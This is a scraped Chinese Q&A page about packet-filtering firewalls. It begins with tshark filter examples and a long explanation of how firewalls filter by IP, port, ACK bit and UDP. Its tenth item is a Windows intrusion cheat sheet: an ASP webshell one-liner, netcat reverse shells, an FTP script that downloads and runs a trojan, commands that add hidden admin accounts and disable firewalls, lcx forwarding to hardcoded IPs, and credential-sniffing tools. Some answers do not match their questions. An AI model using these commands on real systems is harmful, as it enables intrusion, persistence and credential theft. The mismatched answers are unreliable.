包過濾命令_華為防火牆USG以下是配置域間包過濾的命令請問那個policy是干什麼用的

1. 在linux上tshark怎麼過濾

抓Mysql包命令如下：
tshark -s 512 -i eth0 -n -f 'tcp dst port 3306' -R 'mysql.query' -T fields -e mysql.query
tshark -s 512 -i em1 -n -f 'tcp dst port 3306' -R 'mysql.query' -T fields -e mysql.query
過濾HTTP請求：
# tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -R 'http.request.method == "GET" || http.request.method == "HEAD"'
輸出：
Running as user "root" and group "root". This could be dangerous.
Capturing on eth0
0.000000 123.126.68.27 -> 173.255.196.50 HTTP GET /grep.html HTTP/1.1
12.066470 123.126.68.27 -> 173.255.196.50 HTTP GET /pro_lang.html HTTP/1.1
-s 512 :只抓取前512個位元組數據
-i eth0 :捕獲eth0網卡
-n :禁止網路對象名稱解析
-f 'tcp dst port 3306' :只捕捉協議為tcp,目的埠為3306的數據包
-R 'mysql.query' :過濾出mysql.query
-T fields -e mysql.query :列印mysql查詢語句

tshark使用-f來指定捕捉包過濾規則，規則與tcpmp一樣，可以通過命令man pcap-filter來查得。
tshark使用-R來過濾已捕捉到的包，與界面板wireshark的左上角Filter一致。

2. 我用ensp模擬器練習配置命令，想學習QoS或者包過濾命令，敲到老是提示錯誤，是不是模擬沒有這些命令，

華為的模擬器我以前用過，有的命令敲不出來，後來就沒用了，你說的qos這個，估計數敲不出來的，或許換個更高的版本可以

3. 怎樣設置包過濾防止死亡之Ping攻擊

裝個防火牆就可以攔截的!把防火牆設置為"禁止PING入"就行了!如果有人使用PING命令來攻擊你都是可以攔截到的!!

4. 包過濾防火牆的編寫

包過濾防火牆需要了解ACL的用法和規則，主要涉及兩大廠商，一個思科，一個華三，命令格式有所不同，但原理相同。

5. 思科路由器中包含了包過濾技術嗎

有，ACL控制列表，可以過濾掉任何你不希望出去的數據，也可以規定什麼時候斷網，什麼樣的數據幀不被發送出去，不想接受什麼樣的數據幀，只要你會配置命令就行了

6. 怎樣通過防火牆進行數據包過濾

啟動防火牆進行規則設置就可以了

7. 闡述數據包過濾防火牆的工作原理_______.

推薦看一看朱雁冰寫的《Windows防火牆與網路封包截獲技術》，上面介紹了三種分別基於用戶態和核心態下的防火牆編譯，雖然他提到的三種技術現在看來都有不足，但是是一本講解詳細的好書～～～！！

防火牆就是一種過濾塞（目前你這么理解不算錯），你可以讓你喜歡的東西通過這個塞子，別的玩意都統統過濾掉。在網路的世界裡，要由防火牆過濾的就是承載通信數據的通信包。

天下的防火牆至少都會說兩個詞：Yes或者No。直接說就是接受或者拒絕。最簡單的防火牆是乙太網橋。但幾乎沒有人會認為這種原始防火牆能管多大用。大多數防火牆採用的技術和標准可謂五花八門。這些防火牆的形式多種多樣：有的取代系統上已經裝備的TCP/IP協議棧；有的在已有的協議棧上建立自己的軟體模塊；有的乾脆就是獨立的一套操作系統。還有一些應用型的防火牆只對特定類型的網路連接提供保護（比如SMTP或者HTTP協議等）。還有一些基於硬體的防火牆產品其實應該歸入安全路由器一類。以上的產品都可以叫做防火牆，因為他們的工作方式都是一樣的：分析出入防火牆的數據包，決定放行還是把他們扔到一邊。

所有的防火牆都具有IP地址過濾功能。這項任務要檢查IP包頭，根據其IP源地址和目標地址作出放行/丟棄決定。看看下面這張圖，兩個網段之間隔了一個防火牆，防火牆的一端有台UNIX計算機，另一邊的網段則擺了台PC客戶機。

當PC客戶機向UNIX計算機發起telnet請求時，PC的telnet客戶程序就產生一個TCP包並把它傳給本地的協議棧准備發送。接下來，協議棧將這個TCP包「塞」到一個IP包里，然後通過PC機的TCP/IP棧所定義的路徑將它發送給UNIX計算機。在這個例子里，這個IP包必須經過橫在PC和UNIX計算機中的防火牆才能到達UNIX計算機。

現在我們「命令」（用專業術語來說就是配製）防火牆把所有發給UNIX計算機的數據包都給拒了，完成這項工作以後，「心腸」比較好的防火牆還會通知客戶程序一聲呢！既然發向目標的IP數據沒法轉發，那麼只有和UNIX計算機同在一個網段的用戶才能訪問UNIX計算機了。

還有一種情況，你可以命令防火牆專給那台可憐的PC機找茬，別人的數據包都讓過就它不行。這正是防火牆最基本的功能：根據IP地址做轉發判斷。但要上了大場面這種小伎倆就玩不轉了，由於黑客們可以採用IP地址欺騙技術，偽裝成合法地址的計算機就可以穿越信任這個地址的防火牆了。不過根據地址的轉發決策機制還是最基本和必需的。另外要注意的一點是，不要用DNS主機名建立過濾表，對DNS的偽造比IP地址欺騙要容易多了。

伺服器TCP/UDP 埠過濾

僅僅依靠地址進行數據過濾在實際運用中是不可行的，還有個原因就是目標主機上往往運行著多種通信服務，比方說，我們不想讓用戶採用 telnet的方式連到系統，但這絕不等於我們非得同時禁止他們使用SMTP/POP郵件伺服器吧？所以說，在地址之外我們還要對伺服器的TCP/ UDP埠進行過濾。

比如，默認的telnet服務連接埠號是23。假如我們不許PC客戶機建立對UNIX計算機（在這時我們當它是伺服器）的telnet連接，那麼我們只需命令防火牆檢查發送目標是UNIX伺服器的數據包，把其中具有23目標埠號的包過濾就行了。這樣，我們把IP地址和目標伺服器TCP/UDP埠結合起來不就可以作為過濾標准來實現相當可靠的防火牆了嗎？不，沒這么簡單。

客戶機也有TCP/UDP埠

TCP/IP是一種端對端協議，每個網路節點都具有唯一的地址。網路節點的應用層也是這樣，處於應用層的每個應用程序和服務都具有自己的對應「地址」，也就是埠號。地址和埠都具備了才能建立客戶機和伺服器的各種應用之間的有效通信聯系。比如，telnet伺服器在埠23偵聽入站連接。同時telnet客戶機也有一個埠號，否則客戶機的IP棧怎麼知道某個數據包是屬於哪個應用程序的呢？

由於歷史的原因，幾乎所有的TCP/IP客戶程序都使用大於1023的隨機分配埠號。只有UNIX計算機上的root用戶才可以訪問1024以下的埠，而這些埠還保留為伺服器上的服務所用。所以，除非我們讓所有具有大於1023埠號的數據包進入網路，否則各種網路連接都沒法正常工作。

這對防火牆而言可就麻煩了，如果阻塞入站的全部埠，那麼所有的客戶機都沒法使用網路資源。因為伺服器發出響應外部連接請求的入站（就是進入防火牆的意思）數據包都沒法經過防火牆的入站過濾。反過來，打開所有高於1023的埠就可行了嗎？也不盡然。由於很多服務使用的埠都大於1023，比如X client、基於RPC的NFS服務以及為數眾多的非UNIX IP產品等（NetWare/IP）就是這樣的。那麼讓達到1023埠標準的數據包都進入網路的話網路還能說是安全的嗎？連這些客戶程序都不敢說自己是足夠安全的。

雙向過濾

OK，咱們換個思路。我們給防火牆這樣下命令：已知服務的數據包可以進來，其他的全部擋在防火牆之外。比如，如果你知道用戶要訪問Web伺服器，那就只讓具有源埠號80的數據包進入網路：

不過新問題又出現了。首先，你怎麼知道你要訪問的伺服器具有哪些正在運行的埠號呢？象HTTP這樣的伺服器本來就是可以任意配置的，所採用的埠也可以隨意配置。如果你這樣設置防火牆，你就沒法訪問哪些沒採用標准埠號的的網路站點了！反過來，你也沒法保證進入網路的數據包中具有埠號80的就一定來自Web伺服器。有些黑客就是利用這一點製作自己的入侵工具，並讓其運行在本機的80埠！

檢查ACK位

源地址我們不相信，源埠也信不得了，這個不得不與黑客共舞的瘋狂世界上還有什麼值得我們信任呢？還好，事情還沒到走投無路的地步。對策還是有的，不過這個辦法只能用於TCP協議。

TCP是一種可靠的通信協議，「可靠」這個詞意味著協議具有包括糾錯機制在內的一些特殊性質。為了實現其可靠性，每個TCP連接都要先經過一個「握手」過程來交換連接參數。還有，每個發送出去的包在後續的其他包被發送出去之前必須獲得一個確認響應。但並不是對每個TCP包都非要採用專門的ACK包來響應，實際上僅僅在TCP包頭上設置一個專門的位就可以完成這個功能了。所以，只要產生了響應包就要設置ACK位。連接會話的第一個包不用於確認，所以它就沒有設置ACK位，後續會話交換的TCP包就要設置ACK位了。

舉個例子，PC向遠端的Web伺服器發起一個連接，它生成一個沒有設置ACK位的連接請求包。當伺服器響應該請求時，伺服器就發回一個設置了ACK位的數據包，同時在包里標記從客戶機所收到的位元組數。然後客戶機就用自己的響應包再響應該數據包，這個數據包也設置了ACK位並標記了從伺服器收到的位元組數。通過監視ACK位，我們就可以將進入網路的數據限制在響應包的范圍之內。於是，遠程系統根本無法發起TCP連接但卻能響應收到的數據包了。

這套機制還不能算是無懈可擊，簡單地舉個例子，假設我們有台內部Web伺服器，那麼埠80就不得不被打開以便外部請求可以進入網路。還有，對UDP包而言就沒法監視ACK位了，因為UDP包壓根就沒有ACK位。還有一些TCP應用程序，比如FTP，連接就必須由這些伺服器程序自己發起。

FTP帶來的困難

一般的Internet服務對所有的通信都只使用一對埠號，FTP程序在連接期間則使用兩對埠號。第一對埠號用於FTP的「命令通道」提供登錄和執行命令的通信鏈路，而另一對埠號則用於FTP的「數據通道」提供客戶機和伺服器之間的文件傳送。

在通常的FTP會話過程中，客戶機首先向伺服器的埠21（命令通道）發送一個TCP連接請求，然後執行LOGIN、DIR等各種命令。一旦用戶請求伺服器發送數據，FTP伺服器就用其20埠 (數據通道)向客戶的數據埠發起連接。問題來了，如果伺服器向客戶機發起傳送數據的連接，那麼它就會發送沒有設置ACK位的數據包，防火牆則按照剛才的規則拒絕該數據包同時也就意味著數據傳送沒戲了。通常只有高級的、也就是夠聰明的防火牆才能看出客戶機剛才告訴伺服器的埠，然後才許可對該埠的入站連接。

UDP埠過濾

好了，現在我們回過頭來看看怎麼解決UDP問題。剛才說了，UDP包沒有ACK位所以不能進行ACK位過濾。UDP 是發出去不管的「不可靠」通信，這種類型的服務通常用於廣播、路由、多媒體等廣播形式的通信任務。NFS、DNS、WINS、NetBIOS-over-TCP/IP和 NetWare/IP都使用UDP。

看來最簡單的可行辦法就是不允許建立入站UDP連接。防火牆設置為只許轉發來自內部介面的UDP包，來自外部介面的UDP包則不轉發。現在的問題是，比方說，DNS名稱解析請求就使用UDP，如果你提供DNS服務，至少得允許一些內部請求穿越防火牆。還有IRC這樣的客戶程序也使用UDP，如果要讓你的用戶使用它，就同樣要讓他們的UDP包進入網路。我們能做的就是對那些從本地到可信任站點之間的連接進行限制。但是，什麼叫可信任！如果黑客採取地址欺騙的方法不又回到老路上去了嗎？

有些新型路由器可以通過「記憶」出站UDP包來解決這個問題：如果入站UDP包匹配最近出站UDP包的目標地址和埠號就讓它進來。如果在內存中找不到匹配的UDP包就只好拒絕它了！但是，我們如何確信產生數據包的外部主機就是內部客戶機希望通信的伺服器呢？如果黑客詐稱DNS伺服器的地址，那麼他在理論上當然可以從附著DNS的UDP埠發起攻擊。只要你允許DNS查詢和反饋包進入網路這個問題就必然存在。辦法是採用代理伺服器。

所謂代理伺服器，顧名思義就是代表你的網路和外界打交道的伺服器。代理伺服器不允許存在任何網路內外的直接連接。它本身就提供公共和專用的DNS、郵件伺服器等多種功能。代理伺服器重寫數據包而不是簡單地將其轉發了事。給人的感覺就是網路內部的主機都站在了網路的邊緣，但實際上他們都躲在代理的後面，露面的不過是代理這個假面具。

小結

IP地址可能是假的，這是由於IP協議的源路有機制所帶來的，這種機制告訴路由器不要為數據包採用正常的路徑，而是按照包頭內的路徑傳送數據包。於是黑客就可以使用系統的IP地址獲得返回的數據包。有些高級防火牆可以讓用戶禁止源路由。通常我們的網路都通過一條路徑連接ISP，然後再進入Internet。這時禁用源路由就會迫使數據包必須沿著正常的路徑返回。

還有，我們需要了解防火牆在拒絕數據包的時候還做了哪些其他工作。比如，防火牆是否向連接發起系統發回了「主機不可到達」的ICMP消息？或者防火牆真沒再做其他事？這些問題都可能存在安全隱患。ICMP「主機不可達」消息會告訴黑客「防火牆專門阻塞了某些埠」，黑客立即就可以從這個消息中聞到一點什麼氣味。如果ICMP「主機不可達」是通信中發生的錯誤，那麼老實的系統可能就真的什麼也不發送了。反過來，什麼響應都沒有卻會使發起通信的系統不斷地嘗試建立連接直到應用程序或者協議棧超時，結果最終用戶只能得到一個錯誤信息。當然這種方式會讓黑客無法判斷某埠到底是關閉了還是沒有使用。

8. 華為防火牆USG，以下是配置域間包過濾的命令，請問那個policy是干什麼用的

有關華為與用戶之間的責任條款
還有跨國使用條款

9. 基於包過濾防火牆的原理和實現技術是怎樣的

10. 常用的windows滲透命令有哪些

echo ^<%eval request(「#」)%^> >C:\wmpub\hkfe666\h4ck.asp
Md hack 創建hack文件夾
本地nc -vv -p -l 埠
伺服器 nc路徑 -e cmd路徑 ip 埠

Rd hack 刪除文件夾
Type d:\wwwroot\hack.asp 查看一句話木馬的內容
Del d:\wwwroot\hack.asp 刪除hack.asp
Dir c:\ 查看c盤根目錄全部文件夾和文件信息
Tree e:\ 顯示e盤文件目錄樹
reg query 「HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp」 /v portnumber
查看終端確定為3389?
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server 看看fDenyTSConnections的鍵值是多少?值為0是開,為1是關
netstat -ano 能看到3389開啟?
net stop policyagent
net stop sharedaccess
/c dir d:\freehost\weiquanguang\cnhonker*.* /w/o/s

先net stop sharedacess關閉防火，再net stop PolicyAgent關閉篩選

administrator默認被允許，這種情況下，你需將用戶同時加入「Remote Desktop Users」組。
net user xxx pppp /add &net localgroup administrators xxx /add
net localgroup administrators xxx /add
net localgroup 「Remote Desktop Users」 xxx /add 遠程桌面用戶允許設置。

gpEdit.msc

常用系統小命令
gpedit.msc計算機組策略
compmgmt.msc計算機管理
devmgmt.msc設備管理
diskmgmt.msc磁碟管理
fsmgmt.msc共享管理
lusrmgr.ms本地用戶管理
notepad寫字板write
services.msc服務管理

開啟 telnet
@echo off
sc config tlntsvr start= auto
net start telnet

在CMD模式下結束某一進程
一: 通過tasklist 可以查找到相關進程的PID。
語法:tasklist /svc 通過taskkill pid 可以關掉進程。語法: taskkill /im 進程名 /f
二: ntsd -c q -p PID 可以強行結束運行進程
zxarps.exe -idx 0 -ip 目標的IP -port 80,21,3389 -logfilter 「+post,+user,+pass」
dialupass /allusers /stext 「c:\1.txt」
========================================================
query user查詢登陸用戶
logoffID蹬出某用戶
net user 查看所有用戶
c:\xp3389.exe -a
net user 1 1 /add
net1 localgroup administrators 1 /add
C:\>net1 user guest /active:yes 啟用該用戶
=========================================================
whoami 查看全系統許可權
調系統許可權
C:\>c:\windows\system32\cacls.exe c:\windows\system32\net.exe /t /e /g everyone:f
==========================================================
FTP命令行下加賬號的命令;很爽。。。
C:\>ftp
ftp> open 192.168.0.22
ftp> quote site exec net.exe user admin$ jinwei58 /add
ftp> quote site exec net.exe localgroup admin$ /add
200 EXEC command successful (TID=33).
============================================================
ftp傳馬命令
echo open 自己的FTP > cmd.txt
echo 帳戶>> cmd.txt
echo 密碼>> cmd.txt
echo binary >> cmd.txt
echo get 木馬.exe >> cmd.txt
echo bye >> cmd.txt
ftp -s:cmd.txt
木馬.exe
木馬.exe
del cmd.txt. /q
==============================================================
quote site exec net user 用戶名密碼 /add 添加用戶
quote site exec net localgroup administrators 用戶名 /add
tasklist \svc //shell列進程
==============================================================
sql語句加管理用戶
Select MyCmd(「net user」);
select state(「net user」)
select cmdshell(「net user」)
==============================================================
netstat -an
1.查詢終端開放埠
netstat -an | find 「3389″
================================================================
查詢終端3389埠
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal」「Server\WinStations\RDP-Tcp /v PortNumber
================================================================
2.開啟2003終端
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」「Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
================================================================
3.更改終端埠為2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」「Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」「Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
=================================================================
4.取消xp&2003系統防火牆對終端服務的限制及IP連接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
=================================================================
5.開啟Win2000的終端 (需重啟)
先將開啟終端的工具上傳到目標主機的c:\
然後執行c:\ver3389.exe等待系統重啟就可以了
=====================================================================
6.解決終端超出了最大連接數的命令
mstsc /v:ip:3389 /console
=====================================================================
關閉防火牆
net stop sharedaccess
======================================================================
先將雙開3389的工具上傳到目標主機下的c:\
然後運行命令 c:\3389.exe
======================================================================
Tasklist/SVC >>c:\3389.txt
=====================================================================
查看adsl
Dialupass.exe /allusers /stext 「c:\1.txt」
=====================================================================
埠映射篇之lcx使用方法
Lcx 命令
本機運行lcx.exe -listen 3001 3002

c:\lcx.exe -slave 61.184.188.125 3001 肉雞的內網IP 3389
C:\recycler\lcx.exe -slave 121.61.225.211 3001 192.170.0.23 3389
在本機連接: 127.0.0.1:3002
=====================================================================
這里是nc的命令說明：
2.nc反彈提權：
伺服器執行： nc位置 -l -p 8080 -t -e cmd位置
監聽本地入棧信息
NC地址 cmd地址
————————————————— -p port 打開本地埠
本地執行： telnet + 伺服器IP地址 + 446
————————————————— -t 以telnet形式應答入棧請求
傳馬命令： tftp -i ip地址 get 木馬名字.exe -e 程序重定向

額外：傳個NC到Webshell上去，反彈個shell，然後用htran轉發埠數據，接著在本地嗅探。
2.降低運行許可權
////////////////////////////
現在本地監聽一個埠。
nc -vv -l -p 8080
最好是80或8080這樣的埠，被防火牆攔截的幾率小很多。
在WebShell運行下面命令連接我們監聽的埠得到CmdShell:
nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe
—-===============================================================
1.查詢終端埠

xp&2003：REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal」「Server\WinStations\RDP-Tcp /v PortNumber

通用：regedit /e tsp.reg 「HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp」
type tsp.reg

2.開啟XP&2003終端服務
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber\
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」「Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

3.更改終端埠為20008(0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」「Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」「Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4.取消xp&2003系統防火牆對終端服務3389埠的限制及IP連接的限制

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 40404:TCP /t REG_SZ /d 40404:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

5.開啟Win2000的終端，埠為3389(需重啟)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo 「Enabled」=」0″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo 「ShutdownWithoutLogon」=」0″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo 「EnableAdminTSRemote」=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo 「TSEnabled」=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo 「Start」=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo 「Start」=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo 「Hotkey」=」1″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo 「PortNumber」=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo 「PortNumber」=dword:00000D3D >>2000.reg

6.強行重啟Win2000&Win2003系統(執行完最後一條一句後自動重啟)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

7.禁用TCP/IP埠篩選 (需重啟)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8.終端超出最大連接數時可用下面的命令來連接

mstsc /v:ip:3389 /console

9.調整NTFS分區許可權

cacls c: /e /t /g everyone:F (所有人對c盤都有一切權利)

cacls %systemroot%\system32\*.exe /d everyone (拒絕所有人訪問system32中exe文件)
來自文章《windows下面常用的滲透測試命令》

導航:首頁 > 凈水問答 > 包過濾命令

包過濾命令

與包過濾命令相關的資料